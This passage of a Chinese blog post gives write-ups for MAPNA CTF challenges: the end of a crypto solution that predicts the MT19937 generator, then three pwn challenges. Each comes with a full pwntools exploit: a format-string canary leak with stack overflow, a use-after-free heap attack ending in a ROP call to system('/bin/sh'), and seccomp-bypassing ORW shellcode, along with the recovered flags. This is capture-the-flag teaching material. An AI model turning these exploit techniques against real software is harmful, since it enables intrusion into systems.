315911207494925949742212443025101639383551363855632617410391325922132118052280432, 160608721274889447938606989650810386105243008009388938737103600719751998405695052, 80485718020426913778898398898436382386718914865993732581279132006386834763843750, 175256027423949464821148437330609889703365513530429385704635213979205690543187968, 312494592697141143680238564093947039458907138790072672218576868913190841311490441, 12551558878313236197845748627693664902436846005140074555532691630477757920400492, 368163678666609325358026149200535116090648801749210267074911311082497122727619418, 132244486142872991925346591101049195464960273281071718729683433268064480383763200, 187524820546739515326467479985404725103464284941528452333038247179114024353648176, 283320427018968981710753682470612392210145925235229015984823155988278867852342424, 273076274412276025537791810337835157311632197268182698230310819989050497776963263, 327014096802403962955714851262399814244813548393488285833127238998882721132883968, 206832690482752439833856322955815020186765387390104398292271480795930880106073325, 104167288428075991079921385804154376915444422785935287020330329091692992364020356, 468442878028756757484855000070722747267796721762231179211069666438706434848755245, 13006681553773847728990900149289800641720551387610802780788594468812438984199760, 199716185379958028413200192962692404940513822154864483463050473557869065589649168, 412558417168152436059170177108518481504104909389966119467224740980715361039084900, 379013360598848524426838307544021120793535763669172279637583374247930017257612752, 79510803625960975136293110699095743477640774841480691165531320726532279504009152, 119246467719878286004186703543298639812649580965124121805161153548472942538790653, 44235048729597559877492812430806736314711896199059487848598597142896457753232432, 453319033816285234767354843915966019736243075972507643199351036007057824008570000, 300975897791737470999557383409844137620736489995632513055593286593028252152372832, 488688724028459389993054497130088474659149461722402520817247390457263798063265080, 98311703485802819685121101139900586756957739352203591545958914778011243453808576, 503894794312461918204750180188338003935699664049776370432270755067603639622480931]
enc = 1954128229670403595826293823451515985816812578139791173172421160740653397416251058891670696398940725266238000104900728729829302299509397650740333416176077

from extend_mt19937_predictor import ExtendMT19937Predictor
predictor = ExtendMT19937Predictor()
#导入已知的624个数据,导入后指向尾部
for i in range(1,80):
    predictor.setrandbits(TMP[i]//i**2, 256)

KEY = sum([predictor.predict_getrandbits(256 >> _) ** 2 for _ in range(8)]) 
msg = enc^KEY
long_to_bytes(msg)
#b'MAPNA{4Re_y0U_MT19937_PRNG_pr3d!cT0r_R3ven9E_4057950503c1e3992}'

PWN

ninipwn

感觉pwn很难,热身都不好热

栈溢出

int __cdecl main(int argc, const char **argv, const char **envp)
{
  disable_io_buffering();
  puts("XOR encryption service");
  encryption_service();
  return 0;
}
unsigned __int64 encryption_service()
{
  char buf[264]; // [rsp+0h] [rbp-110h] BYREF
  unsigned __int64 v2; // [rsp+108h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  printf("Text length: ");
  __isoc99_scanf("%d", &text_length);
  getchar();
  if ( (unsigned int)text_length < 0x101 )
  {
    printf("Key: ");
    read(0, key, 0xAuLL);                       // \0*8 + \xff*2 覆盖length两字节造成溢出
    printf("Key selected: ");
    printf(key);
    putchar(10);
    printf("Text: ");
    read(0, buf, text_length);
    encrypt((__int64)buf);
    printf("Encrypted output: ");
    write(1, buf, text_length);
  }
  else
  {
    puts("Text length must be less than 256");
  }
  return v2 - __readfsqword(0x28u);
}

先是对长度作了限制,但在读入key的时候有溢出,能覆盖到长度的后两个字节形成溢出.

由于栈深度并不大,不适合覆盖第2字节,控制好长度覆盖到ret的尾字节修改尾字节到win

还有两个小点,先要泄露canary,然后要对payload用key异或

from pwn import *

p = process('./ninipwn')
context(arch='amd64', log_level='debug')

p.sendlineafter(b"Text length: ", b'256')
key = b'%39$p\x00\x00\x00\x19'
p.sendafter(b"Key: ",key)
p.recvuntil(b'0x')
canary = int(p.recv(16), 16)
print(f"{canary = :x}")

pay = b'\x00'*0x108 + flat(canary,0) + b'\x38'
p.sendafter(b"Text: ", xor(pay, key[:8]))

p.interactive()

Buggy Paint

一个堆题,add,free,show,edit都没有问题,但是edit和show都用了select来选择块而select又没有同步,这样在select后如果块已删除变成脏数据,使得edit和show还能使用,形成UAF

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  const char *v3; // rdi
  int v5; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v6; // [rsp+8h] [rbp-8h]

  v6 = __readfsqword(0x28u);
  init_0();
  v3 = "Welcome to BuggyPaint!";
  puts("Welcome to BuggyPaint!");
  while ( 1 )
  {
    sub_12A9(v3, a2);
    menu();
    v5 = -1;
    a2 = (char **)&v5;
    v3 = "%d";
    __isoc99_scanf("%d", &v5);
    getchar();
    switch ( v5 )
    {
      case 1:
        m1add();
        break;
      case 2:
        m2free();
        break;
      case 3:
        m3select();                             // 6060
        break;
      case 4:
        m4edit();                               // select-free-edit实现UAF
        break;
      case 5:
        m5show();
        break;
      default:
        puts("Invalid option");
        return 0LL;
    }
  }
}

1,由于块有大小限制,需要释放8块才能得到unsort

2,select后的块删除后需要再建块将数据块建到原管理块的位置来写指针

3,通过_environ得到栈地址然后在返回地址写ROP

from pwn import *

context(arch='amd64', log_level='debug')
libc = ELF('./libc.so.6')

#p = process('./chall')
p = remote('3.75.185.198', 2000)
def add(idx, w,h, msg = b'A'):
    p.sendlineafter(b'> ', b'1')
    p.sendline(b'0')
    p.sendline(str(idx).encode())
    p.sendline(str(w).encode())
    p.sendline(str(h).encode())
    p.sendline(b'1')
    p.send( msg)

def free(idx):
    p.sendlineafter(b'> ', b'2')
    p.sendline(b'0')
    p.sendline(str(idx).encode())

def select(idx):
    p.sendlineafter(b'> ', b'3')
    p.sendline(b'0')
    p.sendline(str(idx).encode())

def edit(msg):
    p.sendlineafter(b'> ', b'4')
    p.sendlineafter(b': ', msg)

def show():
    p.sendlineafter(b'> ', b'5')
    p.recvuntil(b"Box content:\n")

add(0,0x10,2)
add(1,0x10,2)

for i in range(2,10):
    add(i,0x10,0x10)

select(2)
for i in range(3,10):
    free(i)

free(2)  #释放第8块到unsort利用UAF读得到libc
show()
libc.address = u64(p.recv(8)) - 0x219ce0
print(f"{libc.address = :x}")

for i in range(2,10):
    add(i,0x10,0x10)

select(0)
free(0)
free(1)
#将新块数据部分建到原0块管理块位置写入到environ的指针,show得到栈地址
add(1, 0x10,3,flat(0,1,0,0x10,3,libc.sym['_environ']))
show()
stack = u64(p.recv(8)) - (0xfa8 - 0xe68)
print(f"{stack = :x}")

#重写1块,指到返回地址
free(1)
add(1, 0x10,3,flat(0,1,0,0x10,3,stack))

#gdb.attach(p,"b*0x555555555c44\nc")
#在返回地址写ROP
pop_rdi = libc.address + 0x000000000002a3e5 # pop rdi ; ret
bin_sh = next(libc.search(b'/bin/sh\x00'))
edit(flat(pop_rdi+1, pop_rdi, bin_sh, libc.sym['system']))
p.sendline(b"cat ./flag.txt")
p.interactive()
#MAPNA{1-c4n7-b3l13v3-7h47-4-bu6-c4n-l34d-70-7h15-f23f344b}

Protector

一个加了保护的ORW题

程序会在maze目录写入0x100个文件,其中包含flag并限制只通话open read write getdents close mprotect exit

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[32]; // [rsp+0h] [rbp-20h] BYREF

  disable_io_buffering();
  printf("Input: ");
  init_sandbox();
  read(0, buf, 0x98uLL);
  return 0;
}
Input:  line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x0b 0xc000003e  if (A != ARCH_X86_64) goto 0013
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x08 0xffffffff  if (A != 0xffffffff) goto 0013
 0005: 0x15 0x06 0x00 0x00000000  if (A == read) goto 0012
 0006: 0x15 0x05 0x00 0x00000001  if (A == write) goto 0012
 0007: 0x15 0x04 0x00 0x00000002  if (A == open) goto 0012
 0008: 0x15 0x03 0x00 0x00000003  if (A == close) goto 0012
 0009: 0x15 0x02 0x00 0x0000000a  if (A == mprotect) goto 0012
 0010: 0x15 0x01 0x00 0x0000004e  if (A == getdents) goto 0012
 0011: 0x15 0x00 0x01 0x000000e7  if (A != exit_group) goto 0013
 0012: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0013: 0x06 0x00 0x00 0x00000000  return KILL

编程题,先通过溢出得到libc,然后读入后续的payload到bss然后移栈执行

得到libc后可以得到pop rax和syscall;ret,后续的payload通过mprotect将bss所在页设置成rwx并读入shellcode

shellcode打开maze目录并逐个找开目录里的文件,文件长度不为0时输出

from pwn import *

elf = ELF('./chall')
libc = ELF('./libc6_2.35-0ubuntu3.6_amd64.so')
context(arch='amd64', log_level='debug')

target = 0x404000
pop_rdi_rsi_rdx = 0x4014d9
pop_rbp = 0x00000000004011dd # pop rbp ; ret
ret = 0x4014dc
leave_ret = 0x401525

p = process('./chall')
#p = remote('3.75.185.198', 10000)

#gdb.attach(p, "b*0x401525\nc")

#leak libc, read ROP:mprotect
#libc6_2.35-0ubuntu3.6_amd64
pay = b'\x00'*0x28 + flat([ret, 
    pop_rdi_rsi_rdx, elf.got['printf'],0,0, elf.plt['printf'], #printf(elf.got['printf'])
    pop_rdi_rsi_rdx,0,target+0x100,0x78, elf.plt['read'], #read(0,0x404100,0x78)
    pop_rbp, target+0x100-8, leave_ret
    ])
p.sendafter(b'Input: ',pay.ljust(0x98, b'\x00'))
libc.address = u64(p.recv(6)+b'\0\0') - libc.sym['printf']
print(f"{libc.address = :x}")

syscall = libc.sym['getpid']+9
pop_rax = libc.address + 0x0000000000045eb0 # pop rax ; ret

pay2 = flat([pop_rdi_rsi_rdx, target,0x1000,7, pop_rax, 10, syscall, #mprotect(0x404000,0x1000,7)
    pop_rdi_rsi_rdx, 0, target+0x200,0x100, pop_rax,0, syscall, #read(0,0x404200,0x100)
    target+0x200
    ])
p.send(pay2)

#dir-ORW 打开目录,读目录结构到0x404400
pay_shell = 'nop;'+shellcraft.open('./maze/')+shellcraft.getdents('rax',target+0x400,0x800) 
pay_shell+= f'''
  mov r12, 0x404410;
s1:
  xor rax,rax; mov al, byte ptr [r12]; mov r14,rax /*读目录项长度 存到r14*/
  mov rdi, r12; add rdi,2;
  add r12, r14
  test r14,r14
  jz s2
  cmp r14, 0x18
  jle s1
  dec rdi;mov byte ptr[rdi], 0x2f;  /*在文件名前加 ./maze/ */
  dec rdi;mov byte ptr[rdi], 0x65;
  dec rdi;mov byte ptr[rdi], 0x7a;
  dec rdi;mov byte ptr[rdi], 0x61;
  dec rdi;mov byte ptr[rdi], 0x6d;
  dec rdi;mov byte ptr[rdi], 0x2f;
  dec rdi;mov byte ptr[rdi], 0x2e;
  xor rsi,rsi; xor rdx,rdx; push 2;  pop rax;  syscall;mov r13,rax; /* open(file,0,0) */
  mov rdi,rax;  mov rsi, 0x404f00;  mov rdx, 0x30;  push 0;  pop rax;  syscall; /* read(rax,0x404f00,0x30) */
  test rax,rax; jz s3; /* read返回的长度 */
  mov rdi,1; mov rsi, 0x404f00; mov rdx, 0x30; push 1; pop rax; syscall; /* write(1, 0x404f00,0x30) */
  jmp s2
s3:
  mov rdi,r13; push 3; pop rax; syscall; /* close(r13) */
  test r14,r14
  jnz s1
s2:
  nop
'''
p.send(asm(pay_shell))

p.interactive()
#MAPNA{d3lu510n-0f-pr073c710n-28fba2}

石氏是时试
关注
  • 24
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqoop导入数据到hive ods层
weixin_42219734的博客
05-18 1977
# !/bin/bash# 功能:把源数据表加载到hive ods层# 输入参数据:$1 源数据库 $2 源表名 $3 增全量 $4加载数据日期 $5增量字段1 $6增量字段2 $增量字段3# 如果是全量 增量字段不需要输入# $4加载日期如果不输入 则认为是加载昨日数据# $5,$6,$7 根据实时情况输入# 例:sh sqoop_mysql_hive_table.sh athletics c_...
关于在vscode引入python中Crypto包的问题
西电卢本伟的博客
04-17 4574
python导包,crypto
【CTF WriteUp】2023数字中国创新大赛网络数据安全赛道决赛WP(1)
cccchhhh6819的博客
04-27 3352
不多说了,还是菜,各种不会,还得学。
备份表数据,将历史数据加载到新表中(hive)
weixin_42219734的博客
05-18 1734
if [ $# -eq 2 ];then    yesterday=`date -d yesterday +%Y-%m-%d`    stat_date=${yesterday}elif [ $# -eq 3 ];then    stat_date="$3"else    echo "wrong arg[] number"    exit 1ficur_date=`date +%Y%m%d`#取源...
论文解读Motion Transformer with Global IntentionLocalization and Local Movement Refinement
qq_42008628的博客
12-18 1410
运动预测是自动驾驶的一项基本任务,他对于自动驾驶理解场景,做出决策至关重要。运动预测需要根据agent 状态和路线来预测交通参与者的未来行为,挑战在于物体多模态行为以及复杂的场景环境。主要两种方法两种,1:基于goal的 采用目标候选覆盖所有的目的地,预测每个候选到达真实目的的概率,候选少降低性能,大会增加内存和计算2:direct regression 编码agent特征,自适应的覆盖代理未来行为,收敛速度慢,需要从相同的代理特征中回归不同的运动。
Go语言学习笔记(5)——集合Map
weixin_30677617的博客
07-15 98
集合Map map是使用hash表实现的、无序的键值对的集合!只能通过key获得value,而不能通过index。 map的长度不固定,和slice一样都是引用类型。len函数适用于map,返回map的key的数量。 map的key可以是所有可比较的类型,如布尔型、整型、浮点型、字符串型。。。 map的使用:(make是一个内建函数) 创建map 声明: var mapNa...
Cocos2D两个方法的重构一例
weixin_34342992的博客
01-04 77
大熊猫猪·侯佩原创或翻译作品.欢迎转载,转载请注明出处. 如果觉得写的不好请多提意见,如果觉得不错请多多支持点赞.谢谢! hopy ;) 在RPG游戏项目的GameSpace类中原来有一个方法: -(instancetype)initWithGameScene:(GameScene *)gameScene mapNa...
mapnavi.rar_c++ 地图_mapna_mapnavi_手机地图
09-24
手机地图解决方案 利用goole地图的实现方式
LINUX 精通 3.2
weixin_44925529的博客
06-17 280
main里怎么实现accept_cb 里的regist部分抽出来main里0再改进一下set_event的flag 标志add 还是mod102410485760​ 然后编译调试总结。
表组装示例
chenbingjy的博客
06-21 164
【代码】表组装示例。
韩顺平0基础学java——第25天
m0_50959806的博客
06-17 923
p509-522
8.12 矢量图层面要素单一符号使用二(仅渲染中心点)
雷动专栏
06-18 1075
本章介绍矢量图层线要素单一符号中仅渲染中心点(Centroid fill)的使用说明:文章中的示例代码均来自开源项目qgis_cpp_api_apps介绍了矢量图层面要素单一符号中的仅渲染中心点(Centroid fill)使用。
浅封装BeanUtils,优雅实现List数据copy拷贝
weimeilayer的博客
06-18 289
【代码】浅封装BeanUtils,优雅实现List数据copy拷贝。
基于OpenCV的人脸模型训练
最新发布
06-23
开发环境PyCharm Community Edition
非道路移动机械信息采集汇总表.docx
06-23
非道路移动机械信息采集汇总表.docx
aardio的详解.zip
06-23
aardio
100款古风PPT (13)(1).pptx
06-23
【ppt素材】工作总结、商业计划书、述职报告、读书分享、家长会、主题班会、端午节、期末、夏至、中国风、卡通、小清新、岗位竞聘、公司介绍、读书分享、安全教育、文明礼仪、儿童故事、绘本、防溺水、夏季安全、科技风、商务、炫酷、企业培训、自我介绍、产品介绍、师德师风、班主任培训、神话故事、巴黎奥运会、世界献血者日、防范非法集资、3D快闪、毛玻璃、人工智能等等各种样式的ppt素材风格。 设计模板、图片素材、PPT模板、视频素材、办公文档、小报模板、表格模板、音效配乐、字体库。 广告设计:海报,易拉宝,展板,宣传单,宣传栏,画册,邀请函,优惠券,贺卡,文化墙,标语,制度,名片,舞台背景,广告牌,证书,明信片,菜单,折页,封面,节目单,门头,美陈,拱门,展架等。 电商设计:主图,直通车,详情页,PC端首页,移动端首页,钻展,优惠券,促销标签,店招,店铺公告等。 图片素材:PNG素材,背景素材,矢量素材,插画,元素,艺术字,UI设计等。 视频素材:AE模板,会声会影,PR模板,视频背景,实拍短片,音效配乐。 办公文档:工作汇报,毕业答辩,企业介绍,总结计划,教学课件,求职简历等PPT/WORD模板。
基于稀疏表示求解的人脸识别
06-23
项目使用了matlab的2020b版本实现了该算法。具体的程序文件组织方式请参照src文件夹下的README.txt文件。程序的图片预处理部分用到了Image Processing Toolbox工具箱,稀疏求解部分用到了Optimization Toolbox工具箱。
2000年-2022年 数字化转型与制造企业绿色创新质量-基于供需双侧机制的再检验
06-23
数字化转型是指利用数字技术,如大数据、人工智能、物联网等,对企业的业务流程、组织结构、决策方式等进行全面、深入的改造和升级,以提高企业的运营效率和竞争力。 制造企业绿色创新质量则是指企业在生产过程中,通过采用环保材料、节能技术、循环经济等手段,实现产品生命周期内的环境影响最小化,同时提高产品的质量和性能。 数字化转型与制造企业绿色创新质量之间的关系是一个复杂而重要的议题。从供需双侧机制的角度对这一问题进行再检验,有助于我们更深入地理解这一关系的内在逻辑和影响因素。 相关数据 年份、 股票代码、 股票简称、 行业名称、 行业代码、 省份、 城市、 省份代码、 城市代码 上市状态、 绿色专利总共申请总量 、绿色发明专利总共申请数量、绿色实用新型专利总共申请数量、数字化转型程度A、总资产元、企业年龄、资产负债率、营业收入增长率、第一大股东持股比率、独立董事占比、两职合一

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值